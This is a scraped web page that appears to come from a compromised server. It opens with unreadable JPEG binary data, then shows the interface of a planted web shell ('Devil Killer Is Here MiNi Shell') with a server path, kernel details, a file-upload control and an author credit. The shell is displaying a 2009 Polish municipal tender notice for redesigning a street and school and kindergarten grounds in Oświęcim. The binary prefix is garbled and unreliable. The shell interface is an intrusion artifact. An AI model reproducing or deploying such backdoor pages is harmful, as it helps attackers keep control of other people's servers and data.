JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090512/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090512/143570-N-2009.html

<p class="kh_header"><b>Oświęcim: Opracowanie dokumentacji projektowej przebudowy ul. Broniewskiego w Oświęcimiu wraz z terenem przyległym</b><br>
<b>Numer ogłoszenia: 143570 - 2009; data zamieszczenia: 12.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Oświęcim , ul.Zaborska 2, 32-600 Oświęcim, woj. małopolskie, tel. 033 8429311,8429311, faks 033 8429199.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.oswiecim.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowej przebudowy ul. Broniewskiego w Oświęcimiu wraz z terenem przyległym.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dokumentacja projektowa składać się będzie z dwóch odrębnych części. 
 Część pierwsza obejmować będzie wykonanie projektu budowlano architektonicznego  przebudowy ul. Broniewskiego i ul. Staffa wraz z terenem przyległym na podstawie        koncepcji dostarczonej przez Zamawiającego. 
    Część druga obejmować będzie wykonanie koncepcji zagospodarowania terenu szkoły       podstawowej nr 4  i przedszkola nr 14 oraz wykonanie na tej podstawie  projektu       budowlano architektonicznego.  Koncepcja musi być zaakceptowana przez Zamawiającego      przed wykonaniem projektu budowlanego.

I. Część pierwsza dokumentacji projektowej obejmować będzie:
a   przebudowę ulic Broniewskiego i Staffa z poszerzeniem jezdni do szerokości 5 m wraz       z chodnikami,
b  nowy odcinek drogi od szkoły podstawowej nr 4 do ul. Słowackiego wraz z  chodnikiem,
c   dojazdy do garaży usytuowanych w przewiązkach między blokami
d   poszerzenie drogi dojazdowej do szkoły podstawowej nr 4 i przedszkola nr 14 od ul.      	Tysiąclecia wraz   z  chodnikiem,
e   parkingi i miejsca do zatrzymywania pojazdów,
f   altany śmietnikowe wraz z trzepakami,
g   opaski wokół budynków,
h   odwodnienie powierzchniowe terenu przy budynkach,
i    kanalizację deszczową dla odwodnienia dróg i budynków,
j    oświetlenie dróg, chodników i terenu przy budynkach,
k   małą architekturę,
l    plan wycinki drzew.
     
Powyższe prace projektowe powinny  być wykonane w oparciu o koncepcję przebudowy ul. Broniewskiego wraz z terenem przyległym opracowaną przez Pracownię Projektowo-Usługową PROJSBUD z Zawiercia.

II. Część druga dokumentacji projektowej obejmować będzie:

  Dokumentację projektową dla szkoły podstawowej nr 4 obejmującą:
a   boisko do mini piłki nożnej z nawierzchnią typu sztuczna trawa,
b   boisko wielofunkcyjne do mini piłki ręcznej i siatkowej z nawierzchnią syntetyczną,
c   boisko do mini tenisa ziemnego z nawierzchnią syntetyczną,
d   ogrodzenie boisk - piłkochwyty
e   przebudowa boiska do koszykówki - ułożenie nawierzchni syntetycznej
f    piaskownica z rozbiegiem do skoku w dal
g  bieżnia o długości 240 m trzytorowa o nawierzchni syntetycznej wokół boiska do piłki       nożnej ,
h   bieżnia o długości 100 m czterotorowa o nawierzchni syntetycznej, 
i ogródek z urządzeniami ogólnorozwojowymi dla 6-latków jak plac zabaw w
      przedszkolu,
k   stół do tenisa stołowego stały zewnętrzny, 
l    wymiana ogrodzenia terenu szkoły,
ł    wymiana kanalizacji sanitarnej i deszczowej,
m  odwodnienie liniowe boisk,
n   oświetlenie terenu,
o   budowa miejsc postojowych na terenie szkoły,
p   przebudowa chodników, drogi wewnętrznej pożarowej, miejsce  na altanę śmietnikową.

Dokumentację projektową dla przedszkola nr 14 obejmującą:
a   przebudowa kanalizacji deszczowej,
b   przebudowa kanalizacji sanitarnej,
c   oświetlenie terenu,
d   odwodnienie terenu,
e   przebudowa placów zabaw wraz z nowymi urządzeniami,
f   urządzenie terenów zielonych wraz z nowym zadrzewieniem,
g   przebudowa placów, chodników, dróg i dojazdów,
h   wykonanie miejsc postojowych dla samochodów,
i  przebudowa ogrodzenia - przewiduje się ogrodzenie w systemie Nylofor 3D z paneli 
      z drutu ocynkowanego na słupkach stalowych, 
j   budowę altany śmietnikowej.

Zalecenia do koncepcji zagospodarowania terenu wokół przedszkola nr 14
a   Strona wschodnia - część rekreacyjna parkowa: doposażenie w ławki stałe z oparciem
       osadzone na stałe w podłożu, stoliki z betonowymi blatami o zaokrąglonych krawędziach 
       z czterema siedziskami bez oparć osadzone trwale w podłożu - 2 szt, tablice pionowe 
       zakotwione na stałe do podłoża - 2szt.
       Alejka wydzielona z terenów zielonych.
b  Część centralna ogrodu do zabawy i rekreacji dla dzieci starszych: doposażenie w ławki
   z oparciem osadzone na stałe w podłożu, zestaw inegracyjny wielofunkcyjny, zestaw
   zabawowo-sprawnościowy oparty na sześciokącie, karuzela krzyżakowa mała. Alejka
       wzdłuż tarasu wykończona brukiem kolorowym.
c  Strona zachodnia, część ogrodu przeznaczona do zabaw dla dzieci najmłodszych:
      doposażenie w ławki stałe z oparciem, osadzone na stałe w podłożu. Wieża ze ślizgiem
     opartym na podeście osadzona na wys. 0,9 m., huśtawki sprężynowe  - 3 szt różne         rodzaje, lokomotywa z wagonem.

4.  Szczegółowy zakres opracowania projektowo-kosztorysowego obejmuje:
1. Opracowanie projektu zagospodarowania terenu w 5-ciu egz. wykonany na
     zaktualizowanym podkładzie mapowym w skali 1:500, zawierającego opis techniczny,
     część rysunkową  z oznaczeniem projektowanych obiektów, granic nieruchomości,   
         i zwymiarowaniem projektowanych obiektów,
    - wszystkie wymagane uzgodnienia, w tym uzgodnienia ZUD.
2. Opracowanie projektów budowlano - wykonawczych branży:
   - drogowa,  
   - sieci kanalizacji opadowej, 
   - kanalizacji sanitarnej dotyczy części drugiej projekt, 	
   - oświetlenie, 
   - zagospodarowanie terenu i mała architektura,
  wraz z opisami i rysunkami niezbędnymi do realizacji robót w razie potrzeby
  uzupełnienie szczegółowymi projektami umożliwiającymi wykonanie zamówienia bez
  koniecznych dodatkowych opracowań w ilości 6 egz. Dla każdej z branż. Uzyskanie
  wszelkich wymaganych uzgodnień niezbędnych do otrzymania pozwolenia na budowę dla
  całego przedsięwzięcia inwestycyjnego,
3. Opracowanie projektu organizacji ruchu - w ilości 6-ciu egz.
4. Opracowanie projektu zieleni - w ilości 6-ciu egz.
5. Opracowanie specyfikacji technicznej wykonania i odbioru robót budowlanych przez
    którą należy rozumieć opracowanie zawierającej zbiory wymagań w zakresie sposobu
   wykonania robót budowlanych, właściwości stosowanych materiałów,  sposobu
   wykonania i oceny prawidłowości wykonania poszczególnych robót, użytego sprzętu
   oraz  zakresu prac, które powinny być ujęte w cenach poszczególnych pozycji
    przedmiarowych  w 3 egz.,
6. Wykonanie przedmiarów robót, przez które należy rozumieć opracowania zawierające
    opis robót budowlanych w kolejności technologicznej ich wykonania z podaniem ilości
     jednostek przedmiarowych robót wynikających  z dokumentacji projektowej oraz
     podstaw do ustalenia cen jednostkowych robót lub nakładów rzeczowych - w 6 egz. dla
     każdej z branż,
7. Opracowanie kosztorysów inwestorskich wykonanych zgodnie z Rozporządzeniem
    Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie metod i podstaw
    sporządzania kosztorysu inwestorskiego Dz.U. Nr 130, poz.1389 z 2004r. w 2 egz. dla
    każdej z branż,
8. Sporządzenie wyrysów i wypisów z rejestru gruntu w rozbiciu na:
    - parcele objęte inwestycją
    - parcele sąsiadujące z inwestycją,
9.  Uzyskanie zgód właścicieli działek na wejście w teren,
10. Opracowanie materiałów niezbędnych do uzyskania  decyzji o środowiskowych
     uwarunkowaniach zgody na realizację przedsięwzięcia zgodnie z obowiązującymi      w tym zakresie przepisami,
11. Sporządzenie dokumentacji projektowej w wersji elektronicznej dla potrzeb
      przetargu obejmującej projekt architektoniczno-budowlany,  specyfikacje istotnych      warunków wykonania i odbioru  robót oraz przedmiary robót.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.22.10.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 150.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O zamówienie mogą ubiegać się wykonawcy, którzy:
nie podlegają wykluczeniu na podstawie przepisów art. 24 ust. 1 i 2 oraz spełniają warunki określone w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2007 r. Nr 223, poz. 1655 ze zmianą Dz. U. z 2008 r. Nr 171 poz. 1058 oraz Dz. U. Nr 220, poz. 1420).

2. Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana w oparciu o następujące kryteria:
- posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
- posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym
i osobami zdolnymi do wykonania zamówienia i zrealizowali w ostatnich 3 latach co najmniej jednej usługi,
-  znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia

3. Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana wg formuły spełnia - nie spełnia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oferta musi zawierać następujące oświadczenia i dokumenty:

1. W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24:

a) oświadczenie, że; 
- posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
- posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym
i osobami zdolnymi do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia. W przypadku wybrania drugiej opcji Wykonawca  winien dołączyć do oferty pisemne zobowiązanie, o którym mowa w cyt. wyżej przepisie,
- znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
- nie podlega wykluczeniu z postępowania o udzielenie zamówienia.

b) aktualny odpis z właściwego rejestru albo aktualne zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 

2. W celu potwierdzenia warunku posiadania przez Wykonawcę niezbędnej wiedzy
i doświadczenia oraz dysponowania osobami zdolnymi do wykonania zamówienia:

a) wykaz wykonanej co najmniej 1 usługi w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy
w tym okresie, odpowiadającej swoim rodzajem i wartością usługom stanowiącym przedmiot  zamówienia z podaniem jej wartości, przedmiotu, daty wykonania i odbiorcy oraz załączeniem dokumentu potwierdzającego, że usługa ta została wykonana należycie.

3. Ponadto Wykonawca winien złożyć wraz z ofertą:

a) pełnomocnictwo osób podpisujących ofertę w imieniu firmy składającej ofertę, które winno być przedstawione w formie oryginału lub kopii poświadczonej przez notariusza..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.um.oswiecim.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Oświęcim, ul. Solskiego pok. 11.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.05.2009 godzina 10:00, miejsce: Oferta powinna być złożona w Urzędzie Miasta Oświęcim, ul. Zaborska 2, pok. 1.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com